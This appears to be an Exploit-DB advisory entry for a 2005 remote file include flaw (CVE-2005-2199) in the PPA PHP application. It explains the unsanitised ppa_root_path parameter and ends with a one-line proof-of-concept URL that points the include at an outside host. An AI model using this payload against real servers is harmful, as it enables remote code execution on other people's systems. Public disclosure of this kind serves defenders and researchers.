PPA 0.5.6 ppa_root_path File Include Vulnerability

2005-07-10T00:00:00
ID EDB-ID:25960
Type exploitdb
Reporter skdaemon porra
Modified 2005-07-10T00:00:00

Description

PPA 0.5.6 ppa_root_path File Include Vulnerability. CVE-2005-2199. Webapps exploit for php platform

                                        
                                            source: http://www.securityfocus.com/bid/14209/info

PPA is susceptible to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access. 

http://www.example.com/inc/functions.inc.php?config[ppa_root_path]=http://www.example.com